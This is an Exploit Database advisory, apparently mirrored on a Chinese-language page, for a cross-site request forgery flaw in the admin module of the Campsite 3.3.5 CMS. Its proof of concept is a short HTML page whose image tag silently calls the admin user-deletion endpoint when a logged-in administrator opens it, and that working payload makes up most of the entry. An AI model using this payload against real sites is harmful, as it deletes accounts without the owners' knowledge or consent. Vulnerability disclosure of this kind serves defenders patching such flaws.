Campsite 3.3.5 – Cross-Site Request Forgery

• Exploit Database
• 13 阅读

• 作者： pratul agrawal
  日期： 2010-03-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11676/

•  =======================================================================
   
   campsite 3.3.5 CSRF Vulnerability
   
   =======================================================================
   
   by
   
  Pratul Agrawal
   
   
   
  # Vulnerability found in- Admin module
   
  # email Pratulag@yahoo.com
   
  # company aksitservices
   
  # Credit by Pratul Agrawal
  
  # Category	CMS / Portals
  
  # Site p4ge http://wwwcampware.org/
  
  # Plateform php
  
   
   
  #Proof of concept #
   
  Targeted URL:http://server/admin/login.php
  
   
  Script to delete the Admin user through Cross Site request forgery
  
   ...................................................................................................................
  
  <html>
  
  <body>
  
   <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
  
  </body>
  
  </html>
  
  
   ...................................................................................................................
  
  
  
  After execution refresh the page and u can see that user having giving IDget deleted automatically.
   
   
  #If you have any questions, comments, or concerns, feel free to contact me.